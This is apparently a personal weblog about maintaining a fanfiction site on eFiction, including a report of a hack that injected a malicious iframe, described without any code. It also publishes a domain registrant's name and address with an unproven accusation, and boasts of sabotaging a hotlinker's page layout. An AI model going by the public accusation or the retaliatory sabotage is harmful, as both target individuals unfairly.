Alden Bates' Weblog

OK, A scant couple of days after we upgraded Teaspoon to a more secure version of eFiction, we were hacked into. The hackers used an exploit in eFiction to break in and add some code to one of the files. I have patched the exploit in the version of eFiction on our site, and notified the eFiction authors.

The hacker (who had a Russian IP address) changed a file to insert a 1x1 iframe on every page on the site. The URL they used was malformed and didn't work, but would have pointed at iframebiz.biz, which tried to load a Trojan onto the target's PC.

The registration info on iframebiz.biz is:
Ezhi Brozkevitsh
Al. Armii Ludowej 24
Warszawa 00-609
Poland
+21.225798***

I'm presuming he pays hackers to put code onto sites so he can infect PCs for whatever nefarious purpose.

Edit: the eFiction authors have already issued a security patch. :)

As I mentioned last night, I had to restore some database files. Unfortunately the backup I'd downloaded was in a tarred/gzip file with each database table represented by three files with the extensions frm, myd and myi. After googling a bit (dear Google: please don't bother giving me "Supplemental result" listings if the target page is gone and you don't have a cache copy of it. That's just dumb.) I found that these were raw SQL database files.

The only way to restore them is appeared to be to copy them directly to MySQL's data directory - the problem being that I didn't actually have access to the MySQL data directory on the web server in question. You would think, given that phpMyAdmin had given me these files as a backup that it would have an easy way to restore them, but if it does, I couldn't find it.

The solution ended up being:

1. Install MySQL and MySQL Administrator on my home PC.
2. Copy the appropriate table files to the MySQL data directory.
3. Use MySQL Administrator to make a backup in SQL format.
4. Use the SQL script from the backup to restore the table on the web site.

Once the tables were restored, I used a couple of SQL statements to copy the data across to the appropriate table, and all was hunky dory.

Some things were still broken after I did yesterday's upgrade, so I took a look tonight. Some of the fixes were easy, because they were things missing from the style template which were necessary for the new version. They'd turned up to have changed the default sort order on the story lists, which was easily fixed.

However two things weren't easily fixed: the chapter titles were gone (I presume this was a bug in the upgrade script) and the stories no longer had hit counters on them (they've been removed from the program for some unfathomable reason). Fortunately I had backups of the database, so I reimplemented hit counters, then restored the appropriate table under a new name and copied the appropriate values across.

The last step took a lot longer than it should have, for various reasons.

It was a lot of work, but hopefully people should be happier.

Tonight I spent upgrading A Teaspoon and an Open Mind to eFiction 2, because I found a post on the eFiction forum indicating that there were security holes in 1.1 which could allow people to view other user's passwords.

Looking at my previous entries on eFiction (keep in mind I'm only studying the code briefly here):

• Fixing the Teaspoon - The disappearing help text appears to be fixed in this version, but I can't tell whether they've implemented anything to fix Mac posting.
• eFiction sucks part 2 - I don't see any error handling for when the database is down, or when the story file is unable to be written.

Another thing I fixed a while back was the javascript on the "add story" page. There are two methods of uploading a story: write it in a textarea, or upload it as a text or html file. If you select the textarea, it disables uploading, and vice versa, but there's no way to switch, short of starting over.

At some point I will go back and reinsert my fixes... I'm sure the users will be kept busy by the many and varied new features the authors have added to the software in the meantime.

eFiction was inherited from the previous management of Teaspoon when it was taken over and I volunteered to act as co-techie. Unfortunately there are many places where eFiction is lacking, and one of those is error recovery.

For instance, if the SQL server is down, rather than fail gracefully, you get errors all over the site saying things like:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/whoficco/public_html/index.php on line 35

Which doesn't look very nice, and doesn't tell the user what the problem actually is. This is because there's no test to see if a database query succeeded before going ahead and using the result set.

Equally not very nice is the fact that if, when someone edits a story, eFiction can't open the file to write the changed text to, it fails silently. Yes, it discards the changes and cheerfully gives the user a "Story successfully changed!" message, despite the fact that it hasn't! As this will cause data loss, I've fixed our version to display an error message instead, so the user can at least press the back button and save their changes externally before contacting us so we can fix the problem on the server.

On a more festive note, Brad has an LJ entry going with cool pictures of Halloween pumpkins.

I enacted my revenge against another hotlinker, but, um, given the state of her profile, I'm not sure she's going to notice.

Strike 1: green, pink and cyan(?!)
Strike 2: crappy snow javascript raining broken images on her page. WTF?
Strike 3: strikethrough. Yes, every piece of text on that page has the strikethrough attribute applied.

Oh, and in IE it has a badly drawn pink sun cursor, and bright pink scroll bars.

WTF?! Get off my Internets!

A while back, someone on myspace.com hotlinked to the wee image on my Dead Can Dance page, a nice gothic picture of some arched windows. Since they were so kind as to use my bandwidth to decorate their profile page, I put in a redirection, so people see the somewhat nicer animated picture on the Spice Girls page instead, because everyone needs more Spice Girls. For some reason this person changed to hotlinking to another image on my site, so I redirected that one to the Spice Girls image too. They still have the Spice Girls picture on their profile, so they must be a fan after all.

But I grow bored. They didn't specify any width/height attributes when they hotlinked, so when the browser shows the page, it displays the graphic at full size. That means I can, say, redirect it to an image which is 5120 pixels wide and 1 pixel high, and suddenly their nice layout is alllllllll screwed up. But I wouldn't do that, would I? No, I'm a nice person... Oh, wait, I just did.

Bwahahahaha!

I had to fix two more problems that the MT 3.2 upgrade caused:

1. MTBlacklist no longer seemed to be working with 3.2, so I unloaded it and loaded on the supplied copy of SpamLookup. MTBlacklist's final score was 4380 spams blocked - I'm sure this would have been in the tens of thousands had I not been blocking at the .htaccess level. Hopefully SpamLookup will be as proficient.

2. I was using something along the lines of <MTEntryTitle dirify="1"> to generate the filename for individual entries. Unfortunately with 3.2 the dirify argument (which turns the title into a filename) seems to have stopped regarding '-' as a legal character for filenames, so (for instance) my entry formerly filenamed "stargate_sg-1.html" became "stargate_sg1.html" instead. Am now using the entry_basename as the filename instead, having corrected the entry_basenames for the existing entries to match their current filenames.

*cough* All go now. :P

If a page has a <link rel="next"> tag, FireFox 1.0.6 will prefetch the "next" page on the assumption the user is likely to go there next. In other words, it's treated in the same way as the <link rel="prefetch">.

This is actually in the Link Prefetching FAQ, as I found while googling for more info. I already knew about the "prefetch" link tag, but not the "next" one.

That's all very interesting, since it means if we include "next" tags on chapters in stories when we revamp Teaspoon, FireFox browsers will prefetch the next chapter. On the one hand, it means the next chapter will load faster for the readers, on the other it means if they don't like chapter 1, FireFox will cache chapter 2 unnecessarily. If we switch to static pages, that might not be an issue.

A while back I volunteered to help in the technical side of running A Teaspoon and an Open Mind, a Doctor Who fanfiction site. The site's currently using the eFiction CMS, though Barbarella (the other technical admin) and I will be writing a new CMS as eFiction is not great. Bugs fixed so far:

1. Disappearing Help text
Most of the text on the help page disappeared. The problem turned out to be because the text had < symbols in it, and when the help text was edited in the eFiction settings, either the browser or eFiction would cut the text off at that point. The solution was to double escape the tag to &amp;lt;

2. Broken Mac posting
A user posting from a Mac said that their paragraph breaks were being lost and their stories appearing on the site as one huge lump of text. This was likely to be because the Apple line uses a different byte to signify the end of line, so the solution was simply to convert the end-of-lines to Unix format.

The last item is less a bug than an annoyance. PHP likes appending huge session IDs to the links on the site, so you end up with a hugely long URL with a PHPSESSID thing on the end of it. This causes many problems, including messing up the site's indexing in search engines - because the spiders get a different PHPSESSID each time, they keep indexing the same page over and over. The solution to the ID problem is three lines of code which go in the .htaccess file. Excellent.

That may still not fix the site's indexing in Google because Google is apparently wary of parameters called "sid", and eFiction uses "sid=#####" to select the story to display. It also uses exactly the same title on every single page (the site's name and slogan) which I'm sure doesn't help either.

Dear myspace.com users.

My site is not your private image hosting server. Please do not remote link to my images. Thank you.

Yours in crankiness,
Alden (Do I have to put "please do not remote link" in every piece of alt text?)

You may remember a while back, I posted about how Yahoo hadn't indexed the NZDWFC subdomain very well. I said I'd update with the results in a few months but, um, I forgot.

The results are that the number of pages from the subdomain listed in the Yahoo index has gone from 5 to over a thousand (about 1630, Yahoo reports). This is good. There were only about 2300 redirects last month, as opposed to 4600 in August last year, 432 of last month's resulting from Slurp (Yahoo's web spider) and 140 of them from people searching on Yahoo for stuff. Reducing these values to 0 is impossible, because Yahoo strips the trailing / off URLs, meaning they will always link to (for instance) http://www.tetrap.com/lj instead of http://www.tetrap.com/lj/ and thus causing an unnecessary redirect.

And I see they finally caught up with my music subdomain

Of course, other than the trailing / problem, Yahoo seems to be indexing a lot better than they were last year. And recently announced they had something like 20 billion pages in their index.

OTOH, the www.doctorwho.org.nz domain which points to the NZDWFC site used to show up in Google's NZ index but doesn't any more. I think this is because the domain registration company switched it from doing a permanent redirect to bringing up a page with a meta refresh on it. I have now pointed the domain directly at tetrap.com and I'm doing the redirect myself, so hopefully the NZ domain will reappear in Google's NZ index...

I posted this to my LiveJournal at the beginning of 2004 when I switched web hosts, but I thought I'd update it here...

Sometime prior to June 1996 - Planet FreeNZ

I'm not 100% sure about the month. That's the date of the earliest posting of mine I could find on Google Groups which mentioned the URL. During this period I created the Mel Bush page (the first major part of the site), and then TSV Editor Paul Scoones was so impressed with it he asked me to make the NZDWFC page as well.
Oct 1996 - First Doctor Who Web Guide to mention my site. Actually here's the first Web Guide from December 1995!.
URL: http://www.wn.planet.gen.nz/~bates/

Mar 1998 - IHUG

Moved to IHUG and my site moved with me. It expanded a bit during this time, but not a huge amount because it was an ISP page and therefore there wasn't a lot of disk space provided.
URL: http://homepages.ihug.co.nz/~abates/

30 Aug 1998 - tetrap.simplenet.com

This was the first time I bought hosting. Simplenet was a very good web host at the time, though they didn't have Perl, but offered MIVAscript for creating dynamic web pages. It worked quite well. They were recommended to me by Jason Fraser who had his site on there as varos.simplenet.com.
(The simplenet URL first appeared in the 18 September 1998 Doctor Who Web Guide.)
URL: http://tetrap.simplenet.com/

20 Jan 2000 - tetrap.com registered

Due to the impending buying out of Simplenet by Yahoo, as Yahoo were going to scrap the xxxx.simplenet.com subdomains.

Feb 2000 - Simplenet swallowed by Yahoo

Unfortunately from there the service went downhill, with the MIVA server going down, disk space reduced to 100MB, and eventually Yahoo announced they were going to scrap SSI which my site made (and still makes) heavy use of. I therefore opted to jump ship.

20 July 2001 - switched to CIHost

Worst decision I made. Lots of site slowness and unexplained downtime. Unfortunately I signed up for a year in advance. When July 2002 rolled around again, they charged my credit card without asking me. Despite canceling, it took them several months to give me my money back. The only good thing about this period is that CIHost supported both MIVA and perl, so I was able to convert my miva scripts into perl.

6 Aug 2002 - switched to Sectorlink

Sectorlink were pretty good. Anything was a step up after CIHost, but there were niggly little things that annoyed me. Mainly to do with the site statistics system (ISTR this was the monthly reports I was supposed to be emailed not turning up or turning up months late).

6 Jan 2004 - switched to HostForWeb

HostForWeb have been pretty good. Their control panel and stats are pretty good, I can download the raw access logs, and their technical support is prompt. The only thing I think they need to work on (and this has been a problem all along) is that they rarely announce scheduled down-time, thus occasionally I'll find my site is down, report it, and be told that they're doing a server upgrade. Other than that, they're a pretty darn good web host.

I'm working by the assumption that Tetrapyriarbus started in June 1996, so the site is currently nine years old. That's 90 in Internet years. :)

The name, incidentally, was due to the fact that many other Doctor Who sites took their names from planets from the show, usually something like "Frontios" (there were about three web sites named Frontios at the time, ISTR...) and so I picked a planet name from Time and the Rani.

Most of the traffic to the main part of my site, the www part, seems to be coming at the moment from people looking for LiveJournal icons. I can't think why that would be. :P Also, people really dig the Dalek mood icons. I still prefer the K9 icons, myself. But, like, the average hits to my site keeps going up by the week.

When I started on Host For Web in January '04, my site was using around 1.5GB per month. It's currently eating through 4GB per month... Fortunately my account allows for up to 50GB per month.

• Popular Weblog posts: cmblineext02.dll, My Crappy PC, TabMix, A wee wireless networking question, and The Hotel rant.

My favourite spammers, the Bulgarians switched from comment spam attempts to trackback spam attempts. They didn't notice when I renamed the trackback script and blocked all access attempts to the old one. Apparently they've given up as of the 29th, and I've had very few spam attempts since.

• Popular NZDWFC archive items: Image: Daleks playing computer games, Review: Build the TARDIS, eBook: Who Killed Kennedy, I Exterminated JNT, Notes from a Who Island

Sadly I think most of the people who googled in to the second item were wanting to build a real one, and #1 is probably people searchign for info on the new series. :P June also saw record traffic to the NZDWFC pages due mostly to the build-up to the Prime screenings, and the exposure this got the site in places like This Week in Doctor Who, which is posted to the newsgroup and several high-profile Who sites. Also the Prime Press Pack went up fairly late in the month, but still managed to get into the top 25 pages with some 143 hits. Himpressive.

• Popular music items: Era, The Mass, Daft Punk, Interstella 5555, Daft Punk, D.A.F.T., The Celtic Circle 2, The Celtic Circle.
• Popular Artists: Enigma, Mike Oldfield, Daft Punk, Enya, Moby.

Moby and Daft Punk both released new albums recently, and Mike and Enya are both working on new ones. Enigma is... well, who knows? Hopefully his next album won't have the same copy protection that stops me being able to play Voyageur (See also Hotel). Likewise, what Era are up to is not obvious from their Flashturbated site, which is still merrily promoting their 2003 album.

Along the lines of This is Broken: For as long as I've been using Yahoo! Briefcase, I've had the Briefcase status box on my My Yahoo! page. And for as long as I've had that box there, it has always displayed the same message: "Problem retrieving your personal information. Please try again later."

Clicking on "try again" doesn't do anything, so far as I can see...

Hell, that's not the only thing that's broken on Yahoo! I have the login expiry on Yahoo! mail set to 24 hours. This used to mean after 24 hours, I would have to re-enter my password to get back in. Apparently they have changed this. Now the routine is:

1. I'm prompted to enter my password, which I do.
2. I'm prompted to re-enter my user name, password, type in the text from a graphic, tick the "Remember my ID on this computer" (again).

However, at screen 1, I can hit the "sign in as a different user" link, and I'm taken to a screen where I'm prompted to re-enter my user name, password, and tick the "Remember my ID on this computer" - I.E. the second screen above except with no graphic. This doesn't make much sense to me at all - why have a device to stop robots from logging in if it's so easily circumvented? It just makes it harder for me, as a human, to use my Yahoo! mail...

Edit: Right as I was posting this, I went to add a file to my briefcase. There were two buttons at the bottom of the page:

So which one do I press?! (It's the one on the left, but you have to look at the source to find that out...)